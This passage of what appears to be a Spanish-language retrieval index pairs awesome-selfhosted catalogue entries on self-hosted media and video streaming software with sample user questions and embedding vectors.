-0.18628, -0.10098, -0.03332, 0.01345, -0.1014, -0.01809, -0.11339, -0.10605, -0.05935, -0.1267, -0.14863, -0.02436, -0.15179, -0.20114, 0.01182, -0.02347, 0.02278, -0.13385, -0.03589, 0.06999, -0.12185, -0.05607, 0.07754, 0.07332, 0.02537, -0.0209, -0.11736, -0.08259, 0.08175, 0.05283, -0.08314, 0.00029, -0.13874, -0.04731, 0.01596, 0.04789, 0.0698, 0.01052, -0.06577, 0.01985, -0.08987, 0.04353, 0.09684, 0.07369, -0.05869, -0.08131, -0.14493, -0.01409, -0.0318, 0.08447, -0.11713, 0.01601, -0.09391, -0.03979, 0.09937, -0.05175, 0.09083, 0.05393, -0.00164, -0.01324, -0.08072, -0.00085, 0.03704, 0.03175, -0.11319, 0.0041, -0.083, 0.01433, 0.02944, 0.07186, 0.0561, 0.00294, 0.03527, 0.12321, -0.07844, -0.04701, 0.04519, 0.0634, -0.01861, -0.0464, -0.0624, 0.04821, -0.05813, 0.00929, 0.06218, 0.04317, -0.06489, -0.12882, 0.07023, 0.02581, 0.06382, -0.07139, -0.00709, -0.0685, -0.05033, 0.04244, -0.02564, 0.02335, 0.06344, 0.00899, -0.06326, 0.01871, -0.04, 0.04253, 0.10497, -0.09944, -0.00319, -0.07172, 0.04355, -0.01987, -0.08795, -0.05834, -0.08262, -0.02588, -0.037, -0.08411, -0.02914, -0.01551, 0.03194, -0.06193, 0.03852, -0.06741, 0.13651, -0.01933, -0.05504, 0.02885, -0.04201, 0.03343, 0.01001, 0.01947, -0.03763, -0.03188, -0.00098, -0.05336, 0.08572, -0.00684, -0.11643, -0.07108, 0.01483, 0.00119, -0.01669, -0.10983, -0.00534, 0.06635, -0.00612, -0.08141, -0.05464, 0.09961, 0.00414, 0.03285, -0.02828, -0.04166, -0.00765, 0.02406, 0.02078, -0.10656, -0.10345, 0.00147, -0.10156, 0.05188, 0.05108, -0.00171, -0.0925, -0.01188, -0.00693, -0.01218, 0.02336, -0.05366, -0.00747, 0.05667, 0.02308, -0.0208, 0.05376, -0.02155, -0.00077, -0.03156, 0.01288, -0.02701, -0.06273, 0.06801, -0.00386, 0.04545, 0.04511, -0.02681, 0.01731, 0.04541, -0.00451, -0.00753, -0.03272, 0.03297, 0.03123, 0.01592, 0.07582, -0.05135, -0.08836, -0.03724, 0.01627, 0.04018, -0.03773, -0.06315, 0.02191, -0.00032, 0.013, -0.04867, -0.03766, 0.06892, 0.02651, -0.01346, -0.03503, -0.00292, 0.07337, -0.02942, -0.06352, 0.03024, -0.0175, 0.02986, -0.07334, -0.05129, 0.03141, 0.05434, 0.01486, 0.03965, 0.02567, 0.05384, -0.00242, -0.00389, -0.02098, -0.04085, -0.0072, 0.03537, -0.03668, -0.0718, 0.07755, 0.02745, -0.04035, 0.01202, -0.04031, -0.01856, 0.01646, 0.01456, 0.0487, 0.00998, -0.09214, -0.01068, -0.08391, 0.0329, 0.01483, -0.10417, 0.0767, 0.00497, 0.06513, -0.02736, -0.06221, -0.01456]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: NymphCast β€” Turn your choice of Linux-capable hardware into an audio and video source for a television or powered speakers (alternative to Chromecast) [BSD-3-Clause, C++]. Rygel β€” UPnP AV MediaServer that allows you to easily share audio, video, and pictures. Media player software may use Rygel to become a MediaRenderer that may be controlled remotely by a UPnP or DLNA Controller [LGPL-2.1, C]. Stash β€” A web-based library organizer and player for your adult media stash, with auto-tagging and metadata scraping support [AGPL-3.0, Docker/Go]. Β΅Streamer β€” Lightweight and very quick server to stream MJPEG video from any V4L2 device to the net [GPL-3.0, C/deb]. ΓΌWave β€” Self-hosted collaborative listening platform. Users take turns playing mediaβ€”songs, talks, gameplay videos, or anything elseβ€”from a variety of media sources like YouTube and SoundCloud [⚠, MIT, Nodejs].", "indexar": "existe alguna herramienta web ligera para transmitir vΓ­deo directo desde mis cΓ‘maras de seguridad o dispositivos V4L2?", "v": [0.05473, 0.07883, -0.11665, -0.17115, -0.04557, -0.14167, -0.10981, -0.01126, 0.06643, -0.13642, 0.02903, -0.21199, -0.05265, -0.04421, 0.17078, 0.05141, 0.08175, -0.08124, 0.03214, -0.11304, 0.01344, 0.04638, -0.10242, -0.15176, -0.00185, 0.05848, 0.04562, -0.0247, -0.21473, -0.06713, -0.02292, 0.02334, 0.03057, 0.05389, -0.09601, -0.11364, 0.02467, 0.02936, -0.01971, 0.12981, 0.01152, 0.01944, 0.06263, 0.00372, 0.08599, -0.07698, -0.02169, -0.05834, 0.03253, 0.01615, -0.03814, 0.02856, -0.07429, -0.03865, -0.0989, -0.16698, 0.14802, -0.14069, 0.11768, -0.15832, 0.02372, -0.0092, 0.02527, -0.01824, -0.02207, 0.04589, -0.04089, -0.0048, -0.12833, -0.04129, -0.03379, -0.01788, 0.05105, 0.12712, -0.02999, -0.04109, -0.09666, 0.02973, -0.06459, 0.05094, 0.03328, -0.03007, -0.00122, 0.01402, -0.09158, -0.04861, 0.00472, 0.00674, -0.08767, -0.13161, 0.05767, 0.12574, 0.06137, -0.09135, 0.04241, -0.05863, 0.06264, -0.04238, -0.01361, -0.07324, 0.09776, -0.0334, -0.09337, 0.07005, 0.01153, 0.03047, 0.00893, -0.04505, -0.04986, -0.06287, 0.03279, 0.04294, -0.06142, -0.01242, -0.01143, 0.08956, -0.02499, -0.04826, 0.0149, 0.00197, -0.00462, -0.00506, -0.01168, -0.03488, 0.04467, 0.02949, -0.0443, 0.01998, -0.06215, 0.01718, 0.02967, -0.06616, -0.00567, 0.00291, 0.0407, -0.00957, 0.01778, -0.05956, -0.05725, -0.05097, 0.05989, -0.01759, -0.03659, -0.11119, 0.0604, -0.00679, 0.02622, -0.0194, -0.0847, 0.0994, 0.00279, -0.01973, -0.11822, -0.03621, 0.00056, 0.07553, -0.01427, -0.04437, -0.10941, 0.03361, 0.04451, -0.03972, 0.04888, -0.03604, -0.05091, -0.00541, -0.06732, -0.01221, 0.04586, 0.04208, 0.01733, 0.02009, 0.06743, -0.03776, -0.02923, -0.01965, 0.00594, -0.00963, 0.04355, -0.09202, -0.05392, 0.05355, -0.00072, 0.0574, 0.07438, 0.0004, 0.02878, 0.03418, -0.03819, 0.10653, 0.03763, 0.01148, -0.01229, 0.01937, 0.06081, 0.00358, -0.03228, -0.09753, -0.00919, 0.06317, -0.08294, -0.02442, 0.01444, -0.01903, 0.00574, 0.01414, 0.00214, -0.01249, 0.00738, 0.01124, -0.03505, 0.02827, 0.00601, -0.06102, -0.01942, 0.01681, 0.10092, 0.07262, -0.06627, -0.00123, 0.0636, -0.02862, 0.01867, -0.01353, -0.00477, 0.08814, -0.0173, 0.04219, -0.02276, -0.11253, -0.03224, -0.01032, -0.03545, -0.06078, 0.03744, -0.03273, -0.01113, -0.00067, -0.03011, -0.01465, -0.01422, 0.03237, -0.00964, -0.01025, -0.08242, -0.02178, -0.05833, 0.04575, 0.02178, -0.09213, 0.01548, 0.02584, 0.02967, -0.00953, -0.04298, -0.01121]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: CyTube β€” Synchronize media, chat, and more for an arbitrary number of channels [MIT, Nodejs]. Invidious β€” Alternative YouTube front-end [⚠, AGPL-3.0, Docker/Crystal]. MediaCMS β€” Modern, fully featured open source video and media CMS, written in Python/Django/React, featuring a REST API [AGPL-3.0, Python/Docker]. OvenMediaEngine β€” Streaming Server with Sub-Second Latency [AGPL-3.0, C++/Docker]. Owncast β€” Decentralized single-user live video streaming and chat server for running your own live streams similar in style to the large mainstream options [MIT, Go]. PeerTube β€” Decentralized video streaming platform using P2P (BitTorrent) directly in the web browser [AGPL-3.0, Nodejs]. Rapidbay β€” Videostreaming service/torrent client that allows searching and playing videos from torrents in the browser or from a Chromecast/AppleTV/Smart TV [MIT, Python/Docker]. Restreamer β€” Access H.264 real-time video streaming on your website without a streaming provider [Apache-2.0, Nodejs/Docker].", "indexar": "quΓ© programa sirve para transmitir vΓ­deos en directo y sincronizar chat por mΓ­ mismo?", "v": [-0.20823, 0.05951, -0.10781, -0.0501, 0.00985, -0.18417, -0.0375, -0.0335, 0.01156, -0.09802, 0.03602, -0.10425, -0.02172, -0.07617, 0.08475, 0.05063, 0.12264, 0.00403, 0.11508, -0.02811, 0.04315, -0.03098, 0.04497, -0.2076, -0.07201, 0.03476, 0.01669, 0.02767, -0.05319, 0.03558, -0.00562, 0.03578, 0.04641, 0.03079, 0.06937, -0.10634, 0.08752, 0.04688, -0.06701, 0.12239, -0.02126, -0.03321, 0.0221, 0.04581, 0.11143, -0.07338, 0.04452, -0.0894, -0.00929, 0.01708, 0.05753, 0.06196, 0.02717, -0.00741, -0.07697, -0.16143, -0.00813, -0.22188, 0.09058, -0.08373, 0.12434, -0.00646, 0.0498, -0.06485, 0.02559, -0.01017, 0.0083, 0.0414, -0.1186, 0.03429, -0.08523, -0.03611, 0.07275, 0.12466, -0.03231, 0.0222, -0.13693, 0.06677, -0.055, -0.01807, 0.0435, -0.05105, 0.05902, 0.03234, -0.07658, 0.03163, 0.04285, 0.08267, -0.03711, -0.13, 0.03461, 0.08818, 0.08399, 0.0089, 0.03778, -0.061, 0.07979, -0.04186, 0.02918, -0.02228, 0.04795, -0.05909, -0.16407, 0.05844, 0.0103, 0.1105, 0.07552, -0.14477, -0.07411, 0.01471, 0.03476, 0.0472, -0.04816, -0.05172, 0.00759, 0.01117, -0.05669, 0.00462, 0.01822, 0.05232, -0.09559, 0.06322, 0.02801, -0.01234, 0.013, 0.01924, 0.03978, 0.05387, -0.05402, 0.15701, -0.0276, 0.05491, -0.0291, -0.13352, 0.02084, -0.04364, 0.02352, 0.0338, -0.00031, -0.10285, 0.04365, 0.08489, 0.00874, -0.03834, 0.03462, -0.0204, 0.04862, -0.1551, -0.02323, 0.03502, 0.0055, 0.0051, -0.06081, -0.01153, -0.003, -0.03359, 0.02529, -0.0901, -0.06801, 0.0632, -0.00907, -0.05948, 0.00103, -0.04426, 0.00472, -0.00598, -0.07203, 0.05971, 0.07534, 0.08522, 0.02946, 0.08829, 0.067, -0.0725, -0.03889, 0.04953, 0.03839, -0.02131, 0.01364, -0.06456, -0.04964, 0.01805, 0.04754, 0.01716, -0.00749, -0.00707, -0.04236, 0.07512, 0.00455, 0.03506, 0.0081, -0.00664, -0.03545, 0.01544, 0.00402, -0.00435, -0.05916, -0.06096, -0.03418, -0.034, -0.03714, -0.03912, 0.06719, 0.03261, 0.02734, 0.02671, -0.05914, 0.0132, 0.04569, 0.1155, -0.02917, -0.00204, 0.03649, 0.01647, -0.00238, 0.01061, 0.09268, 0.02991, 0.02267, 0.04488, 0.02117, -0.0261, 0.00858, -0.02985, 0.03143, 0.03179, 0.02516, 0.01633, 0.01706, 0.01439, -0.08413, -0.01837, 0.0015, -0.00643, 0.03631, -0.01164, -0.00715, 0.03214, -0.04227, -0.08285, -0.04997, 0.10106, -0.00406, -0.02494, -0.02547, -0.02299, -0.08797, 0.02529, 0.02687, -0.03084, -0.00391, 0.02775, 0.02458, -0.02692, -0.01455, -0.00056]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: CyTube β€” Synchronize media, chat, and more for an arbitrary number of channels [MIT, Nodejs]. Invidious β€” Alternative YouTube front-end [⚠, AGPL-3.0, Docker/Crystal]. MediaCMS β€” Modern, fully featured open source video and media CMS, written in Python/Django/React, featuring a REST API [AGPL-3.0, Python/Docker]. OvenMediaEngine β€” Streaming Server with Sub-Second Latency [AGPL-3.0, C++/Docker]. Owncast β€” Decentralized single-user live video streaming and chat server for running your own live streams similar in style to the large mainstream options [MIT, Go]. PeerTube β€” Decentralized video streaming platform using P2P (BitTorrent) directly in the web browser [AGPL-3.0, Nodejs]. Rapidbay β€” Videostreaming service/torrent client that allows searching and playing videos from torrents in the browser or from a Chromecast/AppleTV/Smart TV [MIT, Python/Docker]. Restreamer β€” Access H.264 real-time video streaming on your website without a streaming provider [Apache-2.0, Nodejs/Docker].", "indexar": "cuΓ‘l es una alternativa libre de YouTube que funcione directamente desde el navegador?", "v": [-0.03388, 0.05048, -0.18398, 0.01871, -0.04763, -0.03972, -0.01522, -0.07233, -0.03702, -0.17591, -0.05311, -0.19706, -0.00439, 0.04815, 0.01041, -0.08291, 0.09906, -0.10045, 0.13227, -0.08408, -0.04197, -0.05041, -0.03182, -0.05518, -0.03048, -0.08619, -0.07214, -0.00973, -0.05245, -0.07652, 0.0021, 0.0232, 0.02099, 0.02554, -0.04563, 0.03854, 0.15452, 0.07599, 0.03331, -0.05816, -0.00134, -0.07653, -0.1265, 0.14059, -0.12883, 0.04129, 0.01467, -0.08795, -0.03469, -0.01122, 0.01994, 0.00379, -0.16061, 0.05141, -0.0578, 0.03587, 0.10133, -0.14572, 0.03401, -0.08508, 0.00065, -0.07268, 0.0663, 0.02056, 0.01909, 0.014, 0.00737, 0.02732, -0.00662, 0.07862, -0.03093, -0.00948, -0.08182, 0.03656, 0.05649, 0.1702, -0.04027, 0.0398, -0.0541, 0.0514, 0.14197, -0.10671, -0.01383, -0.00483, -0.04284, -0.10285, 0.05505, -0.12352, -0.01868, -0.11526, 0.04462, 0.12378, 0.01942, 0.06546, -0.07488, -0.0779, 0.02655, -0.01379, 0.03586, -0.09881, 0.04751, -0.00726, -0.06483, 0.0875, 0.07983, 0.05211, 0.04832, -0.08535, -0.08426, 0.07231, 0.05433, 0.02003, -0.05367, -0.08678, -0.03379, 0.06288, -0.11011, -0.01964, -0.0306, -0.03455, -0.03061, -0.00578, -0.13364, -0.10222, 0.01564, 0.10588, 0.02359, 0.03293, 0.00661, -0.0002, 0.05815, -0.06154, -0.04422, -0.01358, -0.04692, 0.04434, 0.04495, -0.01378, -0.0287, -0.0321, 0.10479, -0.02441, 0.01208, -0.01853, 0.10727, -0.10536, 0.02369, -0.05259, -0.10173, -0.02436, -0.03401, -0.03374, -0.04216, 0.01544, -0.01617, 0.06191, -0.07581, -0.0518, -0.05467, 0.07754, 0.04096, -0.07722, -0.00602, 0.00264, -0.03589, 0.01279, -0.0698, 0.01962, -0.04316, 0.01091, -0.00079, 0.12831, 0.03326, -0.11046, 0.02098, -0.04353, 0.00227, -0.00184, 0.12523, 0.00165, -0.03902, 0.0246, -0.07274, -0.00198, -0.04546, -0.1002, -0.01678, 0.01974, -0.0597, 0.09004, -0.0494, 0.0027, -0.04775, -0.00597, 0.02964, 0.02136, -0.06696, -0.07841, -0.02645, 0.0025, -0.06134, -0.07531, 0.0214, -0.02217, -0.0617, -0.01619, 0.00457, -0.03275, 0.01824, 0.00901, -0.00467, -0.0439, 0.04889, 0.00446, 0.01904, 0.01984, 0.08582, -0.01368, 0.02381, -0.02201, 0.05424, 0.00876, 0.01392, -0.03051, 0.0214, 0.0657, 0.0465, 0.02921, -0.07466, 0.00978, -0.0082, -0.02727, -0.05123, -0.04231, 0.03016, -0.00491, 0.03672, 0.05392, -0.02793, 0.02644, 0.04202, 0.07927, -0.00599, -0.01253, -0.03792, -0.04613, -0.09274, 0.01191, 0.03875, -0.08643, -0.05109, 0.05963, 0.0286, 0.00741, -0.02043, -0.00512]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: CyTube β€” Synchronize media, chat, and more for an arbitrary number of channels [MIT, Nodejs]. Invidious β€” Alternative YouTube front-end [⚠, AGPL-3.0, Docker/Crystal]. MediaCMS β€” Modern, fully featured open source video and media CMS, written in Python/Django/React, featuring a REST API [AGPL-3.0, Python/Docker]. OvenMediaEngine β€” Streaming Server with Sub-Second Latency [AGPL-3.0, C++/Docker]. Owncast β€” Decentralized single-user live video streaming and chat server for running your own live streams similar in style to the large mainstream options [MIT, Go]. PeerTube β€” Decentralized video streaming platform using P2P (BitTorrent) directly in the web browser [AGPL-3.0, Nodejs]. Rapidbay β€” Videostreaming service/torrent client that allows searching and playing videos from torrents in the browser or from a Chromecast/AppleTV/Smart TV [MIT, Python/Docker]. Restreamer β€” Access H.264 real-time video streaming on your website without a streaming provider [Apache-2.0, Nodejs/Docker].", "indexar": "con quΓ© puedo montar un servidor de transmisiΓ³n de vΓ­deo con baja latencia para mi web?", "v": [-0.07513, 0.06529, -0.13018, -0.09798, -0.21953, -0.03317, -0.04776, 0.01372, 0.04862, -0.07315, -0.05828, -0.09483, 0.07428, -0.01203, 0.00606, 0.10605, 0.14586, 0.00232, 0.09566, -0.03652, 0.07363, 0.03652, 0.07288, -0.11194, 0.01799, 0.09289, 0.06921, 0.00657, -0.15635, -0.03978, -0.02927, -0.00593, -0.03025, 0.13661, 0.06537, -0.02491, -0.02443, 0.07493, -0.0177, 0.02207, -0.01082, -0.04535, 0.02198, -0.05677, -0.02215, -0.07499, 0.02814, -0.13456, 0.01918, -0.00188, 0.01162, -0.01935, -0.12968, -0.03199, -0.13682, -0.0494, 0.07962, -0.20105, 0.10792, -0.04728, 0.01826, 0.04603, -0.06255, -0.03594, -0.00309, -0.00816, -0.07405, -0.00491, -0.08516, -0.00789, -0.00699, -0.09657, -0.02414, -0.01031, -0.01518, 0.04647, -0.11205, 0.02151, -0.03581, 0.09195, 0.03912, 0.01833, 0.01669, 0.09689, -0.05263, 0.04948, -0.05617, -0.05292, 0.09365, -0.10696, 0.06756, 0.10078, 0.02469, -0.07199, 0.0386, -0.13869, 0.06876, -0.00929, -0.04086, -0.08746, 0.00304, 0.04825, -0.06404, 0.12579, 0.11417, 0.07717, 0.13059, -0.09747, -0.02812, -0.01608, 0.08162, 0.04002, -0.14346, -0.0316, -0.06626, -0.05965, -0.09326, 0.03235, -0.00011, 0.07056, -0.03166, 0.05532, 0.04225, 0.00627, -0.01731, -0.03484, 0.00878, 0.02709, -0.12287, 0.02921, -0.01247, -0.02876, -0.05939, -0.0871, 0.06689, 0.01369, 0.0705, -0.00434, -0.06617, -0.01101, 0.04557, -0.06183, -0.06172, 0.01547, 0.07458, -0.03159, 0.10022, -0.1059, -0.10181, 0.01457, -0.01327, -0.00094, -0.06658, -0.11298, -0.06099, -0.01251, 0.06166, -0.08558, -0.02463, 0.0588, 0.04419, 0.08897, -0.00134, -0.01715, -0.00615, 0.0286, -0.09513, 0.08414, 0.01289, 0.02979, -0.00211, 0.04972, -0.00861, -0.0903, -0.00041, -0.01398, -0.06474, -0.05545, -0.02829, -0.0405, 0.00515, 0.03666, 0.02986, 0.10603, 0.00448, -0.0298, -0.01204, 0.02636, -0.042, 0.05731, 0.02125, 0.00633, -0.06123, 0.06521, 0.1073, -0.07799, -0.04595, -0.04938, -0.01439, 0.01326, -0.04107, -0.09411, 0.00965, -0.0006, -0.03013, -0.0476, -0.01968, 0.00259, 0.02342, 0.07454, -0.00558, -0.0039, 0.07162, -0.07827, 0.01355, 0.03789, 0.07609, 0.00762, -0.0357, 0.02586, 0.02648, -0.0132, 0.02241, -0.05512, -0.01943, 0.08888, 0.00788, -0.01408, 0.01201, -0.00416, -0.0669, 0.00622, -0.05691, -0.05099, 0.02162, 0.00071, -0.01627, -0.01413, -0.07827, -0.01447, 0.00576, 0.08795, -0.01538, 0.00256, -0.01906, -0.06, -0.06054, 0.00975, -0.02997, -0.06398, 0.01746, -0.08693, -0.02666, -0.04249, -0.03297, 0.00856]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: SRS β€” A simple, high efficiency and real-time video server, supports RTMP, WebRTC, HLS, HTTP-FLV and SRT [MIT, Docker/C++]. SyncTube β€” Lightweight and very simple to setup CyTube alternative to watch videos with friends and chat [MIT, Nodejs/Haxe]. Tiramisu β€” BitTorrent engine with a FUSE virtual filesystem that streams torrents live to Plex/Jellyfin without downloading (alternative to Real-Debrid) [GPL-2.0, Go/Docker]. Tube Archivist β€” Organize, search, and enjoy your YouTube collection. Subscribe, download, and track viewed content with metadata indexing and a user-friendly interface [⚠, GPL-3.0, Docker]. Tube β€” Youtube-like (_without censorship and features you don't need!_) video sharing app written in Go which also supports automatic transcoding to MP4 H.265 AAC, multiple collections and RSS feed [MIT, Go]. VideoLAN Client (VLC) β€” Cross-platform multimedia player client and server supporting most multimedia files as well as DVDs, Audio CDs, VCDs, and various streaming protocols [GPL-2.0, C/deb].", "indexar": "que programa hay para enviar y reproducir videos en tiempo real con mis amigos?", "v": [0.02294, 0.16464, -0.07515, -0.06155, 0.04719, -0.04441, -0.05512, 0.00739, 0.02769, -0.19353, 0.11098, -0.16612, 0.1373, -0.02609, 0.06222, 0.04819, 0.06964, 0.05027, 0.13611, 0.0476, 0.0881, 0.01576, -0.10709, -0.09181, 0.0066, -0.01806, 0.02733, 0.03072, -0.06983, 0.05132, 0.06295, 0.04039, -0.01966, -0.10839, -0.06322, -0.00275, 0.16932, 0.09129, -0.06577, 0.00475, 0.04614, 0.02406, -0.04569, 0.02199, 0.00488, -0.01957, 0.04335, -0.03347, -0.08901, -0.03354, -0.01647, 0.05443, -0.0417, -0.01145, -0.04655, -0.13354, 0.01355, -0.17623, -0.03376, -0.04105, 0.02786, -0.00202, 0.00162, -0.02918, 0.05465, 0.04796, 0.09743, -0.0453, -0.08823, 0.05012, -0.06604, -0.0244, -0.01368, 0.03287, -0.09549, 0.01863, -0.13306, -0.0348, -0.03941, -0.03532, -0.043, -0.10443, 0.05031, 0.10928, 0.03625, -0.01967, 0.09235, -0.03379, -0.04218, -0.08227, -0.04297, 0.11531, 0.06723, 0.11333, 0.05911, -0.04315, 0.08921, -7e-05, -0.02849, 0.10208, 0.04129, -0.07954, -0.07977, 0.08008, -0.03487, 0.11372, 0.09291, -0.09704, 0.00725, 0.10212, -0.02035, -0.03386, -0.08611, -0.01313, -0.0451, -0.02632, -0.04374, -0.03874, 0.07667, -0.02973, -0.09246, 0.06752, -0.07008, -0.02469, 0.01711, 0.03004, -0.05842, -0.03355, -0.07761, 0.08786, -0.05985, 0.01255, -0.05093, -0.07512, -0.02146, -0.08655, 0.03942, 0.03382, 0.0608, -0.10988, 0.03768, 0.03789, 0.00171, -0.05875, -0.04495, 0.05965, -0.03624, -0.09861, -0.06406, 0.00707, 0.044, 0.03946, 0.00296, 0.04099, -0.06685, -0.03683, 0.03288, 0.0123, -0.06431, -0.00314, 0.01828, 0.11884, -0.00946, -0.12311, 0.02704, -0.02723, -0.01945, 0.08508, 0.05451, 0.01209, -0.02977, 0.00079, 0.08717, -0.08275, -0.02766, -0.01752, 0.0229, -0.10435, 0.03939, -0.06285, -0.00761, 0.04199, 0.07555, 0.08115, 0.01748, -0.06295, -0.05523, 0.14317, -0.0103, 0.03027, 0.05517, -0.08793, 0.03956, 0.08725, 0.01254, -0.04116, -0.06303, -0.00541, 0.01654, 0.00201, -0.03051, -0.068, 0.03369, 0.03419, 0.01077, 0.07482, -0.08011, 0.03774, 0.01424, 0.09007, -0.00405, 0.02644, 0.02087, 0.04499, -0.04634, -0.04249, 0.05398, 0.02575, 0.00347, 0.05619, -0.01808, -0.02197, 0.02677, 0.05906, -0.09498, -0.05333, 0.02278, 0.08054, 0.02916, 0.01166, -0.08139, 0.00012, -0.00455, -0.05608, 0.06612, 0.01313, 0.00467, -0.03112, -0.01425, -0.09679, -0.02415, 0.04175, 0.02662, 0.0171, -0.06624, 0.02432, -0.10293, 0.04368, 0.0078, -0.03401, -0.02438, 0.03394, 0.05027, -0.07721, 0.01679, 0.00995]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: SRS β€” A simple, high efficiency and real-time video server, supports RTMP, WebRTC, HLS, HTTP-FLV and SRT [MIT, Docker/C++]. SyncTube β€” Lightweight and very simple to setup CyTube alternative to watch videos with friends and chat [MIT, Nodejs/Haxe]. Tiramisu β€” BitTorrent engine with a FUSE virtual filesystem that streams torrents live to Plex/Jellyfin without downloading (alternative to Real-Debrid) [GPL-2.0, Go/Docker]. Tube Archivist β€” Organize, search, and enjoy your YouTube collection. Subscribe, download, and track viewed content with metadata indexing and a user-friendly interface [⚠, GPL-3.0, Docker]. Tube β€” Youtube-like (_without censorship and features you don't need!_) video sharing app written in Go which also supports automatic transcoding to MP4 H.265 AAC, multiple collections and RSS feed [MIT, Go]. VideoLAN Client (VLC) β€” Cross-platform multimedia player client and server supporting most multimedia files as well as DVDs, Audio CDs, VCDs, and various streaming protocols [GPL-2.0, C/deb].", "indexar": "cual es una alternativa libre a Real-Debrid para transmitir torrents directamente a Plex o Jellyfin?", "v": [-0.20908, -0.01897, -0.07537, -0.01056, 0.09764, 0.02559, -0.00312, -0.05639, 0.06101, -0.10662, -0.04671, -0.08197, 0.02277, -0.07214, 0.19919, -0.01347, -0.1174, -0.01626, 0.14832, -0.11185, -0.01269, -0.0939, -0.25534, -0.25997, 0.08617, -0.01971, 0.06977, 0.04277, -0.0275, -0.0897, 0.08927, -0.1358, 0.05502, 0.01723, -0.07909, 0.00315, 0.09558, 0.12462, 0.0041, -0.02048, 0.04089, -0.09962, -0.06517, 0.07389, 0.0052, 0.0639, -0.07881, -0.04413, -0.02736, 0.047, 0.01325, 0.01326, -0.17575, 0.01051, -0.00476, -0.03764, -0.00328, -0.20932, 0.01387, -0.06897, -0.05747, -0.06937, -0.02903, -0.08428, 0.01037, -0.0468, -0.01826, 0.03812, -0.10399, 0.04424, 0.08413, -0.03572, 0.03902, 0.02426, -0.10319, 0.00259, -0.0686, -0.1596, 0.02348, 0.02688, 0.18481, -0.10377, 0.12154, 0.0891, -0.06343, -0.06565, -0.0206, -0.10372, 0.00805, 0.01401, -0.00118, 0.01751, -0.02101, 0.01217, 0.07587, -0.11685, 0.04915, 0.022, -0.00347, 0.04313, -0.00215, 0.08037, -0.06149, -0.00496, 0.06694, -0.00462, 0.01754, -0.09156, -0.06541, 0.06163, 0.04658, 0.03275, -0.00509, 0.01637, 0.03659, -0.04321, -0.01154, -0.02442, -0.0237, 0.08646, -0.057, -0.06376, -0.03247, 0.00541, 0.01908, 0.06316, 0.04843, -0.00169, -0.09159, 0.06152, -0.043, 0.04915, -0.05248, -0.04094, -0.07276, -0.02292, 0.08218, 0.01039, 0.0404, -0.02422, 0.0289, 0.01164, 0.0162, 0.03288, -0.01995, 0.00819, -0.03225, 0.00232, -0.00078, 0.00489, -0.03558, -0.01509, 0.0258, 0.00331, 0.05594, 0.00518, -0.05815, 0.01086, -0.12766, 0.05423, 0.08055, -0.01078, -0.01691, -0.06163, -0.08035, -0.03031, 0.03545, 0.02873, -0.0836, 0.04114, 0.0185, 0.05804, 0.09677, -0.03273, -0.03568, -0.03113, -0.01381, -0.03374, 0.05, -0.04791, 0.03099, 0.0302, -0.06816, 0.01664, 0.0237, 0.00866, -0.06143, 0.01031, -0.01942, 0.04813, -0.00668, -0.05137, -0.06628, 0.01923, 0.07049, 0.01727, -0.0219, -0.01638, -0.03978, -0.03232, -0.03929, -0.0029, 0.03843, -0.03675, 0.00665, -0.0274, -0.01854, -0.01365, -0.04879, 0.05601, 0.04046, 0.01375, 0.01832, 0.00647, -0.03465, 0.04091, 0.03074, -0.02324, 0.04782, 0.05437, -0.03813, -0.03059, 0.02117, -0.02699, -0.02905, 0.06414, 0.01289, 0.0145, -0.03832, -0.03058, -0.03256, 0.04351, 0.01535, 0.0246, 0.02018, 0.04997, 0.00177, 0.04571, 0.00675, -0.02011, 0.01545, 0.07719, 0.0132, 0.01006, -0.01645, 0.01432, -0.08239, -0.03247, -0.01525, -0.01289, -0.04491, 0.03585, 0.00278, 0.02887, 0.04121, -0.02284]} -{"tipo": "pregunta", "herramienta": "Media Streaming - Video Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Video Streaming", "tema": "media streaming - video streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Video Streaming: SRS β€” A simple, high efficiency and real-time video server, supports RTMP, WebRTC, HLS, HTTP-FLV and SRT [MIT, Docker/C++]. SyncTube β€” Lightweight and very simple to setup CyTube alternative to watch videos with friends and chat [MIT, Nodejs/Haxe]. Tiramisu β€” BitTorrent engine with a FUSE virtual filesystem that streams torrents live to Plex/Jellyfin without downloading (alternative to Real-Debrid) [GPL-2.0, Go/Docker]. Tube Archivist β€” Organize, search, and enjoy your YouTube collection. Subscribe, download, and track 